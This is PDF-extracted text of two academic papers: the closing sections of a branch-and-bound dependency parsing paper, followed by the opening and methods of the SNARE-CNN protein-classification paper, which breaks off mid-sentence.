documentation on English corpus. The observation is that, the all-sibling features are most helpful for our parser, as some good sibling features can not be encoded in DP based parser. For example, a matched pair of parentheses are always siblings, but their head may lie between them. An- 4In fact, Koo’s algorithm requires only O(n3) space. Our implementation is O(n4) because we store the feature vectors for fast training. 5http://www.ark.cs.cmu.edu/TurboParser/ 44 other observation is that all great grandchild features and all tri-sibling features slightly hurt the perfor- mance and we excluded them from the final system. When no additional resource is available, our parser achieved competitive performance: 93.17% Unlabeled Attachment Score (UAS) for English at a speed of 177 words per second and 87.25% for Chinese at a speed of 97 words per second. High- er UAS is reported by joint tagging and parsing (Bohnet and Nivre, 2012) or system integration (Bohnet and Kuhn, 2012) which benefits from both transition based parsing and graph based parsing. Previous work shows that combination of the two parsing techniques can learn to overcome the short- comings of each non-integrated system (Nivre and McDonald, 2008; Zhang and Clark, 2008). Sys- tem combination will be an interesting topic for our future research. The highest reported performance on English corpus is 93.79%, obtained by semi- supervised learning with a large amount of unla- beled data (Suzuki et al., 2009). 4.6 Tradeoff Between Accuracy and Speed In this section, we study the trade off between ac- curacy and speed using different pre-pruning setups. In Table 3, we show the parsing accuracy and in- ference time in testing stage with different numbers of candidate heads k in pruning step. We can see that, on English dataset, when k ≥ 10, our pars- er could gain 2 − 3 times speedup without losing much parsing accuracy. There is a further increase of the speed with smaller k, at the cost of some ac- curacy. Compared with TurboParser, our parser is less efficient but more accurate. Zhang and McDon- ald (2012) is a state-of-the-art system which adopts cube pruning for efficient parsing. Notice that, they did not use pruning which seems to increase parsing speed with little hit in accuracy. Moreover, they did labeled parsing, which also makes their speed not directly comparable. For each node of B&B tree, our parsing algorithm uses projected sub-gradient method to find the sad- dle point, which requires a number of calls to a DP, hence the efficiency of Algorithm 1 is mainly deter- mined by the number of DP calls. Figure 4 and Fig- ure 5 show the averaged parsing time and number of calls to DP relative to the sentence length with differ- ent pruning settings. Parsing time grows smoothly PTB CTB System UAS w/s UAS w/s Ours (no prune) 93.18 52 87.28 73 Ours (k = 20) 93.17 105 87.28 76 Ours (k = 10) 93.17 177 87.25 97 Ours (k = 5) 93.10 264 86.94 108 Ours (k = 3) 92.68 493 85.76 128 TurboParser(full) 92.82 402 86.05 192 TurboParser(standard) 92.68 638 85.80 283 TurboParser(basic) 90.97 4670 82.28 2736 Zhang and McDon- ald (2012)† 93.06 220 86.87 N/A Table 3: Trade off between parsing accuracy (UAS) and speed (words per second) with different pre- pruning settings. k denotes the number of candi- date heads of each word preserved for B&B parsing. †Their speed is not directly comparable as they per- forms labeled parsing without pruning. when sentence length ≤ 40. There is some fluctua- tion for the long sentences. This is because there are very few sentences for a specific long length (usual- ly 1 or 2 sentences), and the statistics are not stable or meaningful for the small samples. Without pruning, there are in total 132, 161 calls to parse 2, 416 English sentences, that is, each sen- tence requires 54.7 calls on average. For Chinese, there are 84, 645 calls for 1, 910 sentences, i.e., 44.3 calls for each sentence on average. 5 Discussion 5.1 Polynomial Non-local Factors Our bounding strategy can handle a family of non- local factors that can be expressed as a polynomial function of local factors. To see this, suppose zc = ∑ i αi ∏ e∈Ei ze For each i, we introduce new variable zEi = mine∈Ei ze. Because ze is binary, zEi = ∏ e∈Ei ze. In this way, we replace zc by several zEi that can be handled by our bounding strategy. We give two examples of these polynomial non- local factors. First is the OR of local factors: zc = max{ze,z′e}, which can be expressed by zc = ze + z′e−zez′e. The second is the factor of valency feature 45 0 10 20 30 40 50 60 0 5 10 p a rs in g t im e ( se c. ) sentence length k=3 k=5 k=10 k=20 no prune (a) PTB corpus 0 20 40 60 80 100 120 140 0 20 40 60 80 p a rs in g t im e ( se c. ) sentence length k=3 k=5 k=10 k=20 no prune (b) CTB corpus Figure 4 Averaged parsing time (seconds) relative to sentence length with different pruning settings, k denotes the number of candidate heads of each word in pruning step. 0 10 20 30 40 50 60 0 100 200 C a lls t o D P sentence length k=3 k=5 k=10 k=20 no prune (a) PTB corpus 0 20 40 60 80 100 120 140 0 500 1000 C a lls t o D P sentence length k=3 k=5 k=10 k=20 no prune (b) CTB corpus Figure 5 Averaged number of Calls to DP relative to sentence length with different pruning settings, k denotes the number of candidate heads of each word in pruning step. (Martins et al., 2009). Let binary variable vik indi- cate whether word i has k modifiers. Given {ze} for the edges with head i, then {vik|k = 1, . . . ,n − 1} can be solved by ∑ k kjvik = ( ∑ e ze )j 0 ≤ j ≤ n − 1 The left side of the equation is the linear function of vik. The right side of the equation is a polynomial function of ze. Hence, vik could be expressed as a polynomial function of ze. 5.2 k Best Parsing Though our B&B algorithm is able to capture a va- riety of non-local features, it is still difficult to han- dle many kinds of features, such as the depth of the parse tree. Hence, a reranking approach may be use- ful in order to incorporate such information, where k parse trees can be generated first and then a second pass model is used to rerank these candidates based on more global or non-local features. In addition, k-best parsing may be needed in many applications to use parse information and especially utilize infor- mation from multiple candidates to optimize task- specific performance. We have not conducted any experiment for k best parsing, hence we only dis- cuss the algorithm. According to proposition 1, we have Proposition 2. Given p and subset S ⊆ Z, let zk denote the kth best solution of maxz∈S ψ(p,z). If a parse tree z′ ∈ S satisfies ϕ(z′) ≥ ψ(p,zk), then z′ is one of the k best parse trees in subset S. Proof. Since zk is the kth best solution of ψ(p,z), for zj, j > k, we have ψ(p,zk) ≥ ψ(p,zj) ≥ ϕ(zj). Since the size of the set {zj|j > k} is |S| − k, hence there are at least |S| − k parse trees whose scores ϕ(zj) are less than ψ(p,zk). Because ϕ(z′) ≥ ψ(p,zk), hence z′ is at least the kth best parse tree in subset S. Therefore, we can search the k best parse trees in this way: for each sub-problem, we use DP to derive the k best parse trees. For each parse tree z, if ϕ(z) ≥ ψ(p,zk), then z is selected into the k best set. Algorithm terminates until the kth bound is tight. 46 6 Conclusion In this paper we proposed a new parsing algorithm based on a Branch and Bound framework. The mo- tivation is to use dynamic programming to search for the bound. Experimental results on PTB and CTB5 datasets show that our method is competitive in terms of both performance and efficiency. Our method can be adapted to non-projective dependen- cy parsing, as well as the k best MST algorithm (Hall, 2007) to find the k best candidates. Acknowledgments We’d like to thank Hao Zhang, Andre Martins and Zhenghua Li for their helpful discussions. We al- so thank Ryan McDonald and three anonymous re- viewers for their valuable comments. This work is partly supported by DARPA under Contract No. HR0011-12-C-0016 and FA8750-13-2-0041. Any opinions expressed in this material are those of the authors and do not necessarily reflect the views of DARPA. References Michael Auli and Adam Lopez. 2011. A comparison of loopy belief propagation and dual decomposition for integrated CCG supertagging and parsing. In Proc. of ACL-HLT. Egon Balas. 1965. An additive algorithm for solving linear programs with zero-one variables. Operations Research, 39(4). Bernd Bohnet and Jonas Kuhn. 2012. The best of bothworlds – a graph-based completion model for transition-based parsers. In Proc. of EACL. Bernd Bohnet and Joakim Nivre. 2012. A transition- based system for joint part-of-speech tagging and la- beled non-projective dependency parsing. In Proc. of EMNLP-CoNLL. Paul Calamai and Jorge Moré. 1987. Projected gradien- t methods for linearly constrained problems. Mathe- matical Programming, 39(1). Xavier Carreras. 2007. Experiments with a higher-order projective dependency parser. In Proc. of EMNLP- CoNLL. Eugene Charniak and Mark Johnson. 2005. Coarse-to- fine n-best parsing and maxent discriminative rerank- ing. In Proc. of ACL. Wenliang Chen, Min Zhang, and Haizhou Li. 2012. U- tilizing dependency language models for graph-based dependency parsing models. In Proc. of ACL. Michael Collins. 2000. Discriminative reranking for nat- ural language parsing. In Proc. of ICML. Michael Collins. 2002. Discriminative training methods for hidden markov models: Theory and experiments with perceptron algorithms. In Proc. of EMNLP. John Duchi, Shai Shalev-Shwartz, Yoram Singer, and Tushar Chandra. 2008. Efficient projections onto the l1-ball for learning in high dimensions. In Proc. of ICML. Jason M. Eisner. 1996. Three new probabilistic models for dependency parsing: an exploration. In Proc. of COLING. Keith Hall. 2007. K-best spanning tree parsing. In Proc. of ACL. Liang Huang and David Chiang. 2005. Better k-best parsing. In Proc. of IWPT. Liang Huang. 2008. Forest reranking: Discriminative parsing with non-local features. In Proc. of ACL-HLT. Manfred Klenner and Étienne Ailloud. 2009. Opti- mization in coreference resolution is not needed: A nearly-optimal algorithm with intensional constraints. In Proc. of EACL. Terry Koo and Michael Collins. 2010. Efficient third- order dependency parsers. In Proc. of ACL. Terry Koo, Xavier Carreras, and Michael Collins. 2008. Simple semi-supervised dependency parsing. In Proc. of ACL-HLT. Terry Koo, Alexander M. Rush, Michael Collins, Tommi Jaakkola, and David Sontag. 2010. Dual decomposi- tion for parsing with non-projective head automata. In Proc. of EMNLP. Ailsa H. Land and Alison G. Doig. 1960. An automat- ic method of solving discrete programming problems. Econometrica, 28(3):497–520. Andre Martins, Noah Smith, and Eric Xing. 2009. Con- cise integer linear programming formulations for de- pendency parsing. In Proc. of ACL. Andre Martins, Noah Smith, Mario Figueiredo, and Pe- dro Aguiar. 2011. Dual decomposition with many overlapping components. In Proc. of EMNLP. Ryan McDonald, Koby Crammer, and Fernando Pereira. 2005a. Online large-margin training of dependency parsers. In Proc. of ACL. Ryan McDonald, Fernando Pereira, Kiril Ribarov, and Jan Hajic. 2005b. Non-projective dependency pars- ing using spanning tree algorithms. In Proc. of HLT- EMNLP. Joakim Nivre and Ryan McDonald. 2008. Integrating graph-based and transition-based dependency parsers. In Proc. of ACL-HLT. Jorge Nocedal and Stephen J. Wright. 2006. Numerical Optimization. Springer, 2nd edition. 47 Sebastian Riedel and James Clarke. 2006. Incremental integer linear programming for non-projective depen- dency parsing. In Proc. of EMNLP. Alexander M Rush, David Sontag, Michael Collins, and Tommi Jaakkola. 2010. On dual decomposition and linear programming relaxations for natural language processing. In Proc. of EMNLP. David Smith and Jason Eisner. 2008. Dependency pars- ing by belief propagation. In Proc. of EMNLP. Min Sun, Murali Telaprolu, Honglak Lee, and Silvio Savarese. 2012. Efficient and exact MAP-MRF in- ference using branch and bound. In Proc. of AISTATS. Jun Suzuki, Hideki Isozaki, Xavier Carreras, and Michael Collins. 2009. An empirical study of semi-supervised structured conditional models for dependency parsing. In Proc. of EMNLP. Hiroyasu Yamada and Yuji Matsumoto. 2003. Statistical dependency analysis with support vector machines. In Proc. of IWPT. Yue Zhang and Stephen Clark. 2008. A tale of t- wo parsers: Investigating and combining graph-based and transition-based dependency parsing. In Proc. of EMNLP. Hao Zhang and Ryan McDonald. 2012. Generalized higher-order dependency parsing with cube pruning. In Proc. of EMNLP. Yue Zhang and Joakim Nivre. 2011. Transition-based dependency parsing with rich non-local features. In Proc. of ACL-HLT. 48 work_cjzncjfh4jgvffcb2oqjlenewi ---- Submitted 20 November 2018 Accepted 6 February 2019 Published 25 February 2019 Corresponding author Nguyen Quoc Khanh Le, khanhle@ntu.edu.sg, khanhlee87@gmail.com Academic editor Shawn Gomez Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.177 Copyright 2019 Le and Nguyen Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS SNARE-CNN: a 2D convolutional neural network architecture to identify SNARE proteins from high-throughput sequencing data Nguyen Quoc Khanh Le1 and Van-Nui Nguyen2 1 School of Humanities, Nanyang Technological University, Singapore 2 University of Information and Communication Technology, Thai Nguyen University, Thai Nguyen, Vietnam ABSTRACT Deep learning has been increasingly and widely used to solve numerous problems in various fields with state-of-the-art performance. It can also be applied in bioinformatics to reduce the requirement for feature extraction and reach high performance. This study attempts to use deep learning to predict SNARE proteins, which is one of the most vital molecular functions in life science. A functional loss of SNARE proteins has been implicated in a variety of human diseases (e.g., neurodegenerative, mental illness, cancer, and so on). Therefore, creating a precise model to identify their functions is a crucial problem for understanding these diseases, and designing the drug targets. Our SNARE-CNN model which uses two-dimensional convolutional neural networks and position-specific scoring matrix profiles could identify SNARE proteins with achieved sensitivity of 76.6%, specificity of 93.5%, accuracy of 89.7%, and MCC of 0.7 in cross- validation dataset. We also evaluate the performance of our model via an independent dataset and the result shows that we are able to solve the overfitting problem. Compared with other state-of-the-art methods, this approach achieved significant improvement in all of the metrics. Throughout the proposed study, we provide an effective model for identifying SNARE proteins and a basis for further research that can apply deep learning in bioinformatics, especially in protein function prediction. SNARE-CNN are freely available at https://github.com/khanhlee/snare-cnn. Subjects Bioinformatics, Computational Biology, Data Mining and Machine Learning Keywords Position specific scoring matrix, SNARE protein function, Deep learning, Membrane fusion, Vesicular transport protein, Cancer, Human disease, Biological domain, Overfitting, Protein family classification INTRODUCTION Deep learning is an advanced machine learning and artificial intelligent technique to learn the representative data with multiple layers of neural networks (LeCun, Bengio & Hinton, 2015). Numerous difficult problems have been solved with deep learning, e.g., speech recognition, visual object recognition, object detection. The advantages of deep learning are: (1) significantly outperforms other solutions in multiple domains, (2) reduces the requirement for feature extraction and time consumption with the use of graphic processing units (GPUs), and (3) easily adapts to a new problem. Deep neural network How to cite this article Le NQK, Nguyen V-N. 2019. SNARE-CNN: a 2D convolutional neural network architecture to identify SNARE proteins from high-throughput sequencing data. PeerJ Comput. Sci. 5:e177 http://doi.org/10.7717/peerj-cs.177 https://peerj.com mailto:khanhle@ntu.edu.sg mailto:khanhlee87@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.177 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://github.com/khanhlee/snare-cnn http://doi.org/10.7717/peerj-cs.177 models often achieve better performance compared to shallow networks, especially in most of problems with big data. Therefore, deep learning becomes popular and attracts numerous huge companies establishing their directions in this field in recent years. Nowadays, much progress towards deep learning has been made using different deep neural network architectures. A number of studies showed that using deep learning can enhance results in various fields, e.g., prediction of cervical cancer diagnosis (Fernandes et al., 2018), piRNA (Wang, Hoeksema & Liang, 2018), and isolated guitar transcription (Burlet & Hindle, 2017). Hence, deep learning is also a fascinating trend in bioinformatics and computational biology research. This study attempts to present a framework to apply deep learning in bioinformatics by using two-dimensional convolutional neural network (2D CNN), which is one popular type of deep neural networks. We anticipate our method will lead to a significant improvement when compared to traditional machine learning techniques in the bioinformatics field. In earlier years, researchers used shallow neural networks for solving a number of problems in bioinformatics and computational biology. For example, Ou constructed QuickRBF package (Oyang et al., 2005) for training radial basis function (RBF) networks and applied them on several bioinformatics problems including classifying electron transport proteins (Le, Nguyen & Ou, 2017), transporters (Le, Sandag & Ou, 2018), and binding sites (Le & Ou, 2016a; Le & Ou, 2016b). Chang & Lin (2011) introduced LibSVM to help biologists implement bioinformatics models by using support vector machines. Recently, as deep learning has been successfully applied in various fields, researchers started to use it in bioinformatics problems, e.g., prediction of piRNA (Wang, Hoeksema & Liang, 2018) and ab initio protein secondary structure (Spencer, Eickholt & Cheng, 2015). Although those studies achieved very good performances, we believe that we can obtain superior results by using 2D CNN in some bioinformatics applications. In this study, we applied our architecture in the prediction of SNARE proteins, which is one of the most vital molecules in the life sciences. SNARE is an evolutionary superfamily of small proteins that have a conservation pattern of 60–70 amino acids (SNAP motifs) in their cytoplasmic domain. SNARE proteins catalyze cell membrane integration in eukaryotes and are essential for a wide range of cellular processes, including cell growth, cytokinesis, and synaptic transmission (Jahn & Scheller, 2006; Wickner & Schekman, 2008). Most SNAREs contain only one SNARE motif adjacent to a single C-terminal membrane (e.g., synaptobrevin 2 and syntaxin 1). Some SNAREs contain two SNARE motifs that are connected by a long linkage and non-transmembrane sequence (e.g., SNAP-25) but are attached to the membrane through a post-translational modification such as palmitoylation. Various types of SNARE proteins now identified and several studies demonstrated that a functional loss of SNARE proteins has been implicated in numerous diseases (e.g., neurodegenerative (Hou et al., 2017), mental illness (Honer et al., 2002), cancer (Meng & Wang, 2015; Sun et al., 2016), and so on). Therefore, SNARE proteins play an important function in the cell and there is a need to develop some bioinformatics techniques to identify them. Because of the essential role in human diseases, SNARE proteins attracted various researchers who conducted their research on them. For instance, Kloepper team attempted Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 2/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.177 to build a database to store and classify SNARE proteins (Kienle, Kloepper & Fasshauer, 2009; Kloepper, Kienle & Fasshauer, 2007; Kloepper, Kienle & Fasshauer, 2008). Next, Van Dijk et al. (2008) built a framework to predict functions of SNAREs in sub-Golgi localization. Moreover, Weimbs et al. (1997) used bioinformatics techniques to analyze conserved domains in SNARE. Yoshizawa et al. (2006) extracted sequence motifs and the phylogenetic features of SNARE-dependent membrane trafficking. Shi et al. (2016) directed targeting of membrane fusion by SNARE mimicry by convergent evolution of Legionella effectors. Lu (2015) analyzed the destructive effect of botulinum neurotoxins on the SNARE protein and proposed that the truncated SNAP-25 mutants will disrupt the assembly of the SNARE core complex, and then inhibit the synaptic membrane fusion accordingly. Most published works on SNARE proteins achieved high performance, but to our knowledge, no researcher conducted the prediction of SNARE proteins using machine learning techniques. It is challenging and motivates us to create a precise model for this. Besides that, we also applied deep learning in this problem, which is a modern technique for classification and obtain high accuracies in various fields. Based on the advantages of deep learning, this study consequently proposes the use of a 2D convolutional neural network (CNN) constructed from position-specific scoring matrix (PSSM) profiles to identify SNARE proteins. The basic principle has already been successfully applied to identify electron transporting proteins (Le, Ho & Ou, 2017) and Rab GTPases (Le, Ho & Ou, 2018). Thus, in this paper, we extend this approach to identify the molecular functions of SNARE proteins. The main achievements, including contributions to the field, are presented as follows: (i) development of a deep learning framework to identify SNARE functions from protein sequences, in which our model exhibited a significant improvement beyond traditional machine learning algorithms; (ii) first computational study to identify SNARE proteins and provide useful information to biologists to discover the SNARE molecular functions; (iii) valid benchmark dataset to train and test SNARE proteins with high accuracy, which forms a basis for future research on SNARE proteins. As shown in a series of recent publications (Chen et al., 2018; Cheng, Xiao & Chou, 2018a; Cheng, Xiao & Chou, 2018b; Chou, Cheng & Xiao, 2018; Feng et al., 2018; Jia et al., 2019; Khan et al., 2018; Xiao et al., 2018b), to develop a really useful statistical predictor for a biological system, one should observe the guidelines of Chou’s 5-step rule (Chou, 2011) to make the following five steps very clear: (i) how to construct or select a valid benchmark dataset to train and test the predictor; (ii) how to formulate the statistical samples with an effective mathematical expression that can truly reflect their intrinsic correlation with the target to be predicted; (iii) how to introduce or develop a powerful algorithm (or engine) to operate the prediction; (iv) how to properly perform cross-validation tests to objectively evaluate the anticipated accuracy of the predictor; (v) how to provide source code and dataset that are accessible to the public. Below, we are to describe how to deal with these steps one-by-one. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 3/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.177 Figure 1 Flowchart for identifying SNARE proteins using two-dimensional convolutional neural net- works. Full-size DOI: 10.7717/peerjcs.177/fig-1 MATERIALS & METHODS We implemented an efficient framework for identifying SNARE proteins by using a 2D CNN and PSSM profiles. The framework consists of four procedures: data collection, feature extraction, CNN generation, and model evaluation. Figure 1 presents the flowchart of our framework, and its details are described as follows. Dataset The dataset was retrieved from the UniProt database (by 22-10-2018) (UniProt Consortium, 2014), which is one of the comprehensive resources for the protein sequence. First of all, we collected all SNAREs proteins from the UniProt annotation (by using keyword ‘‘SNARE’’). Note that only reviewed proteins (records with information extracted from literature and curator-evaluated computational analysis) were collected. Subsequently, BLAST (Altschul et al., 1997) was applied to remove the redundant sequences with similarity more than 30%. However, after this process, the rest of proteins only reached 245 SNAREs, and the number of data points was insufficient for a precise deep learning model. Hence, we used a cut-off level of 100% in the cross-validation dataset for more data to create a significant model. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 4/17 https://peerj.com https://doi.org/10.7717/peerjcs.177/fig-1 http://dx.doi.org/10.7717/peerj-cs.177 Table 1 Statistics of all retrieved SNARE and non-SNARE proteins. Cross-validation Independent SNARE 644 38 Non-SNARE 2,234 349 We still used similarity of 30% in the independent dataset to evaluate the performance of the model. This step is a very important step to check if the model was overfitting or not. The proposed problem was the binary classification between SNARE proteins and general proteins, thus we collected a set of general proteins as negative data. In order to create a precise model, there is a need to collect negative dataset which has a similar function and structure with the positive dataset. From that, it is challenging to build a precise model but it increases our contribution to the predictor. It will also help us decrease the number of negative data collected. After considering the structure and function, we chose vesicular transport protein, which is a general protein including SNARE protein. We counted it as negative data to perform the classification problem. We removed the redundant data between two datasets as well as the sequences with similarity more than 30%. Finally, there were 682 SNARE proteins and 2583 non-SNARE proteins used. We then divided data into cross-validation and independent dataset. The detail of the dataset using in this study is listed in Table 1. Encoding feature sets from the protein sequence information In order to convert the protein sequence information into feature sets, we applied the PSSM matrices for FASTA sequences. A PSSM profile is a matrix represented by all motifs in biological sequences in general and in protein sequences in particular. It is created by rendering two sequences having similar structures with different amino acid compositions. Therefore, PSSM profiles have been adopted and used in a number of bioinformatics problems, e.g., prediction of protein secondary structure (Jones, 1999), protein disorder (Shimizu, Hirose & Noguchi, 2007), and transport protein (Ou, Chen & Gromiha, 2010) with significant improvements. Since the retrieved dataset is in FASTA format, it needs to be converted into PSSM profiles. To perform this task, we used PSI-BLAST (Altschul et al., 1997) to search all the sequence alignments of proteins in the non-redundant (NR) database with two iterations. The query to produce the PSSM profile is as follows: psiblast.exe -num_iterations 2 -db <nr>-in_msa <fasta_file>-out_ascii_<pssm_file> The feature extraction part of Fig. 1 indicates the information of generating the 400 PSSM capabilities from original PSSM profiles. Each amino acid in the sequence is represented by a vector of 20 values (each row). First, we summed up all rows with the same amino acid to transform the original PSSM profiles to PSSM profiles with 400 dimensions. The purpose of this step is to force this data type into something easier for the neural network to deal with. Each element of the 400D input vector was then divided by the sequence length and then be scaled before inserting into neural networks. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 5/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.177 Input layers for 2D convolutional neural networks The architecture of our CNN is described in the below part of Fig. 1. The CNN contains three layers: an input layer, hidden layers (including convolutional, pooling and fully connected layers), and an output layer. CNN had been applied in numerous applications in various fields and convinced wonderful results (Amidi et al., 2018; Palatnik de Sousa, 2018). In our study, an input of the CNN is a PSSM corresponding to the protein sequences. We then propose a method to predict SNARE proteins by using their PSSM profiles as the input data. With this type of dataset, we assumed the PSSM profile with 20×20 matrix as a grayscale image with 20×20 pixels, we can then train the model with two-dimensional CNN. The input PSSM profile was then connected to our 2D CNN in which we set a variety of parameters to improve the performance of the model. By using a 2D CNN rather than other neural network structures, we aimed to capture as many hidden spatial features as possible in the PSSM matrices. This approach guarantees the correctness of the generated features and prevents the disorder problem inside the amino acid sequences. The more hidden layers generated, the more hidden features generated in CNN to identify SNARE proteins easily. In this work, we used four filter layers (with 32, 64, 128, and 256 filters) and three different kernel sizes in each filter. Multiple hidden layers for deep neural networks Following the input layer, hidden layers aim to generate matrices to learn the features. We established the hidden layers that contained various sub-layers with different parameters and shapes. Those 2D sub-layers are zero padding, convolutional, max pooling and fully-connected layers with different numbers of filters. All of the layers are combined together to become the nodes in the deep neural networks. The quality of our model was determined by the number of layers and parameters. The first layer of our 2D CNN architecture is the zero padding 2D layer, which added zero values at the beginning and the end of 20×20 matrices. The shape matrix changed to 22×22 dimensions when we added the zero padding layer into our network. After we applied the filters into the input shape, the output dimension was not different under the effect of the zero padding. zp= k−1 2 (1) where k is the filter size. Next, the 2D convolution layer was used with a kernel size of 3×3, meaning that the features will be learned with the 3×3 matrices and sliced to the end. After each step, the next layer will take the weights and biases from its previous layer and train again. Normally, a 2D max-pooling layer follows the 2D convolution layer. There are several parameters for a max-pooling layer, i.e., loop size and stride. In our study, we performed max pooling by a stride of 2 through the selection of the maximum value over a window of 22. By using this process, we can reduce the processing time in the next layers. The output size of a convolutional layer is computed as follow. os= w−k+2p s +1 (2) where w is the input size, k is the filter size, p is the padding and s is the stride size. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 6/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.177 Output layers The first layer in the output layer is a flatten layer. A flatten layer is always included before fully connected layers to convert the input matrix into a vector. We applied two fully connected layers in which each node is fully-connected to all the nodes of the previous layer. Fully connected layers are typically used in the last stages of CNNs. All the nodes of the first layer are connected to the flatten layer to allow the model to gain more knowledge and perform better. The second layer connects the first fully-connected layer to the output layer. Moreover, we inserted the next layer, dropout, to enhance the performance results of the model and it also helps our model prevent overfitting (Srivastava et al., 2014). In the dropout layer, the model will randomly deactivate a number of neurons with a certain probability p. By tuning the dropout value (from 0 to 1), we will save a lot of computing time for the next layers, and the training time will be faster. Furthermore, an additional non-linear operation called ReLU (Rectified Linear Unit) was performed after each convolution operation. To define the ReLU output, we used this formula: f (x)=max(0,x) (3) where x is the number of inputs into a neural network. The output of the model was computed through a softmax function by which the probability for each possible output was determined. The softmax function is a logistic function which is defined by the following formula: σ(z)i= ezi∑K k=1e zk (4) where z is the input vector with K-dimensional vector, K-dimensional vector σ(z) is real values in the range (0, 1) and jth class is the predicted probability from sample vector x. In summary, we set a total of 233,314 trainable parameters in the model (Table 2). Performance evaluation The most important purpose of the present study was to predict whether or not a sequence is SNARE protein; therefore, we used ‘‘Positive’’ to define the SNARE protein, and ‘‘Negative’’ to define the non-SNARE protein. For each dataset, we first trained the model by applying 5-fold cross-validation technique on the training dataset. Based on the 5-fold cross-validation results, hyper-parameter optimization process was employed to find the best model for each dataset. Finally, the independent dataset was used to assess the predictive ability of the current model. Based on the Chou’s symbols introduced for studying protein signal peptides (Chou, 2001), a set of four intuitive metrics were derived, as given in Eq. 14 of Chen et al. (2013) or in Eq. 19 of Xu et al. (2013). For evaluating the performance of the methods, we also adopted Chou’s criterion used in many bioinformatics studies (Chen et al., 2007; Feng et al., 2013; Taju et al., 2018). Either the set of traditional metrics copied from math books or the intuitive metrics derived from the Chou’s symbols (Eqs. (5)–(8)) are valid only for the single-label systems (where each sample only belongs to one class). For the multi-label systems (where a sample may simultaneously belong to several classes), whose existence Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 7/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.177 Table 2 All layers and trainable parameters of the two-dimensional convolutional neural networks in this study. Layer (type) Output shape Parameters # Zeropadding2d_1 (None, 3, 22, 20) 0 Conv2d_1 (None, 1, 20, 32) 5,792 Max_pooling2d_1 (None, 1, 10, 16) 0 Zeropadding2d_2 (None, 3, 12, 16) 0 Conv2d_2 (None, 1, 10, 64) 9,280 Max_pooling2d_2 (None, 1, 5, 32) 0 Zeropadding2d_3 (None, 3, 7, 32) 0 Conv2d_3 (None, 1, 5, 128) 36,992 Max_pooling2d_3 (None, 1, 2, 64) 0 Zeropadding2d_4 (None, 3, 4, 64) 0 Conv2d_4 (None, 1, 2, 256) 147,712 Max_pooling2d_4 (None, 1, 1, 128) 0 Flatten_1 (None, 128) 0 Dense_1 (None, 256) 33,024 Dropout_1 (None, 256) 0 Dense_2 (None, 2) 514 Activation_1 (None, 2) 0 has become more frequent in system biology (Cheng, Xiao & Chou, 2017a; Cheng, Xiao & Chou, 2017b; Cheng et al., 2017a; Xiao et al., 2018a), system medicine (Cheng et al., 2017b) and biomedicine (Qiu et al., 2016), a completely different set of metrics as defined in (Chou, 2013) is absolutely needed. Some standard metrics were used, such as sensitivity, specificity, accuracy, and Matthews correlation coefficient (MCC) using below given formulae (TP, FP, TN, FN are true positive, false positive, true negative, and false negative values, respectively): Sensitivity =1− N+ − N+ ,0≤Sen≤1 (5) Specificity =1− N− + N− ,0≤Spec ≤1 (6) Accuracy =1− N+ − +N− + N++N− ,0≤Acc ≤1 (7) MCC = 1− ( N+ − N+ + N− + N− ) √( 1+ N− + −N+ − N+ )( 1+ N+ − −N− + N− ),−1≤MCC ≤1 (8) The relations between these symbols and the symbols in Eqs. (5)–(8) are given by:  N− + =FP N+ − =FN N+=TP+N+ − N−=TN +N− + (9) Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 8/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.177 Figure 2 Amino acid composition in SNARE and non-SNARE proteins. Full-size DOI: 10.7717/peerjcs.177/fig-2 RESULTS AND DISCUSSIONS The quality and reliability of the modeling techniques of research is an important factor in the study. Initially, we designed an experiment by analyzing data, perform calculations and take various comparisons in the results and discussions section. Composition of amino acid in SNARE and non-SNARE proteins We analyzed the composition of amino acid and the variance of amino acid composition in SNARE sequences and non-SNARE sequences by computing the frequency between them. Figure 2 illustrates the amino acids which contributed the significantly highest frequency in two different datasets. We realized that the amino acid E, and K, and L occur at the highest frequencies surrounding the SNARE proteins. On the other hand, amino acids G and P occur at the highest frequencies surrounding the non-SNARE proteins. Therefore, these amino acids certainly had an essential role in identifying SNARE proteins. Thus, our model might predict SNARE proteins accurately via the special features from those amino acids contributions. Performance for identifying SNARE proteins with 2D CNN We implemented our 2D CNN architecture by using Keras package with Tensorflow backend. First, we tried to find the optimal setup for the hidden layers by doing experiments using four different filter sizes: 32, 64, 128, and 256. Table 3 demonstrates the performance results from various filter layers in the cross-validation dataset. We easily observe that during the 5-fold cross-validation to identify SNAREs, the model with 256 filters was prominent identifying these sequences with an average 5-fold cross-validation accuracy of 88.2%. The performance results are higher than the performances from the other results Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 9/17 https://peerj.com https://doi.org/10.7717/peerjcs.177/fig-2 http://dx.doi.org/10.7717/peerj-cs.177 Table 3 Performance results of identifying SNAREs with different filter layers. Filters Sens Spec Acc MCC 32 68.3 91.9 86.6 0.61 32–64 69.9 93.2 88 0.65 32–64–128 73.3 91.5 87.5 0.64 32–64–128–256 70.5 93.3 88.2 0.65 Figure 3 The validation accuracy on identifying SNARE proteins using different optimizers. Full-size DOI: 10.7717/peerjcs.177/fig-3 with other filters. The sensitivity, specificity, and MCC for cross-validation data achieved 70.5%, 93.3%, and 0.65, respectively. Therefore, we used 256 filters for the hidden layer to develop our model. We then optimized the neural networks using a variety of optimizers: rmsprop, adam, nadam, sgd, and adadelta. The model was reinitialized, i.e., a new network is built, after each round of optimization so as to provide a fair comparison between the different optimizers. Overall, the performance results are 